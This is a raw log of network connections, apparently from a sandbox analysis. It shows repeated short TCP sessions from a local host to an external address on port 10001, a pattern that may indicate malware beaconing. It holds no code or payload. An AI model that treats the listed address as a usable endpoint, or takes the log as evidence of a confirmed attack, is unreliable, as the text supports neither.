                                                                Oct 1, 2024 09:17:44.698940039 CEST4977310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:44.703687906 CEST10001497738.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:44.803749084 CEST4977410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:44.808629036 CEST10001497748.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:44.808757067 CEST4977410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:44.808901072 CEST4977410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:44.813677073 CEST10001497748.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:45.952497959 CEST10001497748.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:45.952512980 CEST10001497748.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:45.952569962 CEST10001497748.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:45.952668905 CEST4977410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:45.952805042 CEST4977410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:45.957550049 CEST10001497748.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:46.069535017 CEST4977510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:46.076773882 CEST10001497758.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:46.076865911 CEST4977510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:46.076970100 CEST4977510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:46.081727982 CEST10001497758.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:47.050570011 CEST10001497758.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:47.050620079 CEST10001497758.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:47.050822973 CEST4977510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:47.050822973 CEST4977510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:47.050899029 CEST4977510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:47.055787086 CEST10001497758.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:47.164963007 CEST4977610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:47.169955969 CEST10001497768.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:47.170211077 CEST4977610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:47.170264959 CEST4977610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:47.175017118 CEST10001497768.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:48.123918056 CEST10001497768.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:48.123971939 CEST4977610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:48.124011993 CEST10001497768.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:48.124052048 CEST4977610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:48.124114037 CEST4977610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:48.128914118 CEST10001497768.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:48.241600037 CEST4977710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:48.248814106 CEST10001497778.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:48.248933077 CEST4977710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:48.249100924 CEST4977710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:48.254888058 CEST10001497778.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:49.197149992 CEST10001497778.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:49.197683096 CEST10001497778.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:49.197762966 CEST4977710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:49.203026056 CEST4977710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:49.207834005 CEST10001497778.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:49.319070101 CEST4977810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:49.324300051 CEST10001497788.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:49.324383020 CEST4977810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:49.324487925 CEST4977810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:49.329937935 CEST10001497788.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:50.296108961 CEST10001497788.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:50.296179056 CEST4977810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:50.296217918 CEST10001497788.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:50.296266079 CEST4977810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:50.296310902 CEST4977810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:50.301099062 CEST10001497788.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:50.397134066 CEST4977910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:50.402053118 CEST10001497798.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:50.402132988 CEST4977910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:50.402236938 CEST4977910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:50.406972885 CEST10001497798.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:51.369102955 CEST10001497798.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:51.369185925 CEST10001497798.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:51.369204998 CEST4977910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:51.369240999 CEST4977910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:51.369374990 CEST4977910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:51.375612974 CEST10001497798.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:51.475929976 CEST4978010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:51.480912924 CEST10001497808.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:51.480999947 CEST4978010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:51.481307983 CEST4978010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:51.486282110 CEST10001497808.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:52.431555986 CEST10001497808.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:52.431619883 CEST4978010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:52.431742907 CEST10001497808.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:52.431785107 CEST4978010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:52.537602901 CEST4978010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:52.537894964 CEST4978210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:52.542519093 CEST10001497808.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:52.542788029 CEST10001497828.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:52.542854071 CEST4978210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:52.542958975 CEST4978210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:52.547838926 CEST10001497828.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:53.539417028 CEST10001497828.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:53.539458036 CEST10001497828.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:53.539482117 CEST4978210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:53.539510965 CEST4978210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:53.539702892 CEST4978210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:53.544451952 CEST10001497828.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:53.713768959 CEST4978310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:53.718700886 CEST10001497838.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:53.718774080 CEST4978310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:53.721587896 CEST4978310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:53.726376057 CEST10001497838.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:54.689713955 CEST10001497838.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:54.689790964 CEST10001497838.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:54.689843893 CEST4978310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:54.689966917 CEST4978310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:54.694746017 CEST10001497838.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:54.803358078 CEST4978410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:54.808264971 CEST10001497848.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:54.810595989 CEST4978410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:54.810755968 CEST4978410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:54.815499067 CEST10001497848.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:55.758268118 CEST10001497848.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:55.758397102 CEST10001497848.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:55.758444071 CEST4978410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:55.758444071 CEST4978410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:55.764712095 CEST4978410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:55.769629955 CEST10001497848.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:55.865973949 CEST4978510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:55.871144056 CEST10001497858.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:55.871234894 CEST4978510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:55.871373892 CEST4978510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:55.876143932 CEST10001497858.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:56.837666988 CEST10001497858.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:56.837738991 CEST10001497858.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:56.837785959 CEST4978510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:56.837785959 CEST4978510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:56.837899923 CEST4978510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:56.842643976 CEST10001497858.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:56.944103003 CEST4978610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:56.949121952 CEST10001497868.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:56.949223042 CEST4978610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:56.949346066 CEST4978610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:56.954099894 CEST10001497868.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:58.517384052 CEST10001497868.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:58.517514944 CEST10001497868.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:58.517524958 CEST10001497868.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:58.517575026 CEST10001497868.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:58.517596960 CEST4978610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:58.517685890 CEST4978610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:58.517738104 CEST4978610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:58.522455931 CEST10001497868.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:58.631494999 CEST4978710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:58.636353016 CEST10001497878.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:58.640566111 CEST4978710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:58.640695095 CEST4978710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:58.645407915 CEST10001497878.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:59.583570004 CEST10001497878.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:59.583590031 CEST10001497878.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:59.583633900 CEST4978710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:59.583671093 CEST4978710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:59.583775997 CEST4978710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:59.588562965 CEST10001497878.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:59.694278955 CEST4978810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:59.699338913 CEST10001497888.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:59.699443102 CEST4978810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:59.699615955 CEST4978810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:59.704423904 CEST10001497888.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:00.651453972 CEST10001497888.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:00.651525021 CEST4978810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:00.651549101 CEST10001497888.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:00.651606083 CEST4978810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:00.651647091 CEST4978810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:00.656445026 CEST10001497888.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:00.758553028 CEST4978910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:00.763521910 CEST10001497898.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:00.763593912 CEST4978910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:00.763720036 CEST4978910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:00.768486977 CEST10001497898.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:01.725831985 CEST10001497898.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:01.725852966 CEST10001497898.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:01.725929976 CEST4978910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:01.725929976 CEST4978910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:01.726073027 CEST4978910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:01.730835915 CEST10001497898.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:01.834719896 CEST4979010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:01.839793921 CEST10001497908.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:01.839876890 CEST4979010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:01.840148926 CEST4979010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:01.844935894 CEST10001497908.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:02.821022034 CEST10001497908.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:02.821095943 CEST4979010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:02.821120977 CEST10001497908.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:02.821166992 CEST4979010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:02.821233034 CEST4979010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:02.826850891 CEST10001497908.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:02.928453922 CEST4979110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:02.933382988 CEST10001497918.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:02.933479071 CEST4979110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:02.933568954 CEST4979110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:02.938360929 CEST10001497918.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:03.911815882 CEST10001497918.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:03.911832094 CEST10001497918.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:03.911926985 CEST4979110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:03.912049055 CEST4979110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:03.916866064 CEST10001497918.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:04.022190094 CEST4979210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:04.027121067 CEST10001497928.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:04.027210951 CEST4979210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:04.027379036 CEST4979210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:04.032171965 CEST10001497928.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:04.981847048 CEST10001497928.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:04.981937885 CEST4979210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:04.981952906 CEST10001497928.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:04.982009888 CEST4979210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:04.982132912 CEST4979210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:04.986871004 CEST10001497928.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:05.100223064 CEST4979310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:05.105097055 CEST10001497938.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:05.105174065 CEST4979310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:05.105262995 CEST4979310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:05.110074997 CEST10001497938.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:06.064009905 CEST10001497938.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:06.064071894 CEST10001497938.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:06.064081907 CEST4979310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:06.064114094 CEST4979310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:06.064227104 CEST4979310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:06.068968058 CEST10001497938.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:06.178550005 CEST4979410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:06.183422089 CEST10001497948.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:06.183510065 CEST4979410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:06.183608055 CEST4979410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:06.188539982 CEST10001497948.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:07.142935991 CEST10001497948.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:07.142988920 CEST4979410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:07.143723011 CEST10001497948.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:07.143840075 CEST4979410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:07.258008957 CEST4979410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:07.258363962 CEST4979510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:07.262842894 CEST10001497948.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:07.263205051 CEST10001497958.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:07.263278961 CEST4979510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:07.263447046 CEST4979510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:07.268188000 CEST10001497958.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:08.247355938 CEST10001497958.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:08.247378111 CEST10001497958.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:08.247426987 CEST4979510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:08.247459888 CEST4979510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:08.247513056 CEST4979510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:08.252276897 CEST10001497958.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:08.350300074 CEST4979610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:08.355223894 CEST10001497968.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:08.355295897 CEST4979610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:08.355396986 CEST4979610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:08.360326052 CEST10001497968.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:09.322186947 CEST10001497968.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:09.322268963 CEST4979610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:09.322340012 CEST10001497968.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:09.322392941 CEST4979610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:09.322427988 CEST4979610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:09.327982903 CEST10001497968.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:09.428410053 CEST4979710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:09.433415890 CEST10001497978.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:09.433486938 CEST4979710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:09.433604956 CEST4979710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:09.438466072 CEST10001497978.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:10.406157970 CEST10001497978.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:10.406193018 CEST10001497978.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:10.406358957 CEST4979710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:10.406358957 CEST4979710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:10.406411886 CEST4979710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:10.411204100 CEST10001497978.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:10.522161961 CEST4979810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:10.529414892 CEST10001497988.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:10.529484034 CEST4979810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:10.529619932 CEST4979810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:10.537233114 CEST10001497988.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:11.475215912 CEST10001497988.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:11.475282907 CEST4979810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:11.475321054 CEST10001497988.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:11.475367069 CEST4979810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:11.475455046 CEST4979810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:11.480166912 CEST10001497988.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:11.584677935 CEST4979910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:11.589653969 CEST10001497998.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:11.589749098 CEST4979910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:11.589905977 CEST4979910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:11.594659090 CEST10001497998.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:12.557328939 CEST10001497998.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:12.557418108 CEST4979910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:12.557526112 CEST10001497998.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:12.557575941 CEST4979910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:12.664208889 CEST4979910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:12.664527893 CEST4980010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:12.669030905 CEST10001497998.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:12.669471979 CEST10001498008.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:12.669552088 CEST4980010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:12.669694901 CEST4980010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:12.674825907 CEST10001498008.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:13.613919020 CEST10001498008.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:13.614005089 CEST4980010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:13.614037037 CEST10001498008.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:13.614082098 CEST4980010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:13.614120960 CEST4980010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:13.618874073 CEST10001498008.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:13.725579023 CEST4980110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:13.730540037 CEST10001498018.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:13.730648994 CEST4980110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:13.730804920 CEST4980110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:13.735579967 CEST10001498018.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:14.684660912 CEST10001498018.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:14.684748888 CEST4980110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:14.684838057 CEST10001498018.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:14.685028076 CEST4980110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:14.803390980 CEST4980110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:14.803622961 CEST4980210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:14.808265924 CEST10001498018.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:14.808481932 CEST10001498028.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:14.808545113 CEST4980210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:14.808661938 CEST4980210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:14.813512087 CEST10001498028.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:15.751969099 CEST10001498028.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:15.752043962 CEST10001498028.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:15.752080917 CEST4980210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:15.752238989 CEST4980210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:15.752239943 CEST4980210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:15.757071972 CEST10001498028.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:15.876148939 CEST4980310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:15.885495901 CEST10001498038.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:15.885597944 CEST4980310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:15.885741949 CEST4980310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:15.892859936 CEST10001498038.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:16.838865995 CEST10001498038.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:16.838928938 CEST4980310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:16.839124918 CEST10001498038.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:16.839190960 CEST4980310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:16.943983078 CEST4980310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:16.944221020 CEST4980410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:16.948904037 CEST10001498038.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:16.948995113 CEST10001498048.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:16.949076891 CEST4980410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:16.949246883 CEST4980410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:16.954011917 CEST10001498048.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:17.902736902 CEST10001498048.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:17.902792931 CEST4980410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:17.902937889 CEST10001498048.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:17.902971029 CEST4980410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:18.065082073 CEST4980410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:18.065396070 CEST4980510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:18.069937944 CEST10001498048.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:18.070348024 CEST10001498058.130.42.227192.168.2.4
